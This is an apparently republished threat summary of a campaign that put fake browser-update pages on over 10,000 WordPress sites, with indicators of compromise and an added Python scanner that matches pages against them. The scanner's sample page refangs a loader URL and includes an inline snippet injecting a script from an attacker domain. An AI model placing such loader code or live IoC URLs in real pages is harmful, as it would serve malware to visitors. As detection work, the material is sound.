10,000 WordPress Websites Found Delivering MacOS and Microsoft Malware – c/side

This week’s discovery revealed over 10,000 compromised WordPress sites displaying deceptive Google browser update pages. The malware, targeting both Apple and Microsoft users, includes AMOS and SocGholish variants. The exploitation occurred through client-side attacks utilizing outdated WordPress plugins, notably the RocketLazyLoadScript. This incident highlights vulnerabilities in the web supply chain and reiterates the importance of timely software updates. Affected: WordPress sites, Apple users, Microsoft users

Key points:

  • Over 10,000 WordPress sites are affected by fake Google browser update pages.
  • The malware includes AMOS (Atomic macOS Stealer) and SocGholish, targeting Apple and Microsoft users, respectively.
  • The exploitation utilizes outdated WordPress versions and plugins.
  • Malicious JavaScript injected through vulnerabilities in the RocketLazyLoadScript plugin.
  • First instance of these malware types delivered via a client-side attack.
  • Dynamic loading of malicious scripts creates the deceptive browser update page.
  • 27 malicious domains linked to this campaign were identified.
  • It is critical to update WordPress and its plugins to mitigate such risks.

MITRE Techniques:

  • Web Service (T1071) – JavaScript exploited outdated plugins to inject malicious code.
  • Client-Side Injection (T1176) – The attackers dynamically injected an iframe to display the fake update page.
  • Exploit Public-Facing Application (T1190) – Utilized a vulnerability in the RocketLazyLoadScript plugin to exploit outdated WordPress versions.

Indicators of Compromise:

  • [URL] https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js
  • [Domain] blacksaltys[.]com
  • [Domain] objmapper[.]com
  • [Domain] rednosehorse[.]com
  • [Domain] blackshelter[.]org
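
The indicators above are only useful if they are actually checked against the pages a site serves. The following is an added example written for this summary (not c/side's tooling) that scans fetched HTML for the two forms the campaign's loader takes according to the key points: an external script or iframe pointing at a listed domain, and an inline script that builds such a reference dynamically. The IoC list is the one published above; the sample page, the `cdn.` subdomain and the local plugin path in it are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators listed in the summary above, kept defanged in source.
DEFANGED_IOCS = [
    "deski.fastcloudcdn[.]com",
    "blacksaltys[.]com",
    "objmapper[.]com",
    "rednosehorse[.]com",
    "blackshelter[.]org",
]


def refang(indicator: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for matching."""
    return indicator.replace("[.]", ".").lower()


IOC_DOMAINS = sorted(refang(d) for d in DEFANGED_IOCS)


def matching_ioc(host: str):
    """Return the listed domain that host equals or sits under, else None."""
    host = host.lower().rstrip(".")
    for d in IOC_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return None


class ScriptAndFrameCollector(HTMLParser):
    """Collects external script/iframe sources and inline script bodies,
    the two places an injected loader shows up in a fetched page."""

    def __init__(self):
        super().__init__()
        self.external = []   # (tag, url) for <script src> and <iframe src>
        self.inline = []     # text of inline <script> blocks
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append((tag, src))
        elif tag == "script":
            self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline.append(data)


def scan_html(html: str):
    """Return (kind, matched_domain) for every reference to a listed IoC."""
    p = ScriptAndFrameCollector()
    p.feed(html)
    findings = []
    for tag, url in p.external:
        # urlparse handles https://host/..., protocol-relative //host/...,
        # and yields no hostname for site-local paths like /wp-content/...
        host = urlparse(url).hostname
        hit = matching_ioc(host) if host else None
        if hit:
            findings.append((tag, hit))
    for body in p.inline:
        low = body.lower()
        for d in IOC_DOMAINS:
            if d in low:
                findings.append(("inline-script", d))
    return findings


# Constructed sample of a fetched page: one legitimate site-local plugin
# script, one external loader at a listed domain (path taken from the IoC
# list above), and one inline loader that builds a script tag pointing at a
# constructed subdomain of a listed domain.
SAMPLE_PAGE = """<html><head>
<script src="/wp-content/plugins/some-plugin/assets/app.js"></script>
<script src="https://deski.fastcloudcdn.com/m_c_b28cd5c86f08a2b35c766fc4390924de.js"></script>
</head><body>
<script>
var s = document.createElement('script');
s.src = 'https://cdn.blacksaltys.com/loader.js';
document.head.appendChild(s);
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, domain in scan_html(SAMPLE_PAGE):
        print(f"IoC hit: {kind} -> {domain}")
```

Run against HTML saved from each page of a site (including admin-facing ones), this flags both the direct loader and the inline stage that creates it. Because the scan is static, a loader that is only assembled at runtime from obfuscated strings will not match; for that case the same domain list should also be applied to the outbound request log of a headless-browser crawl of the site.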

Full Story: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware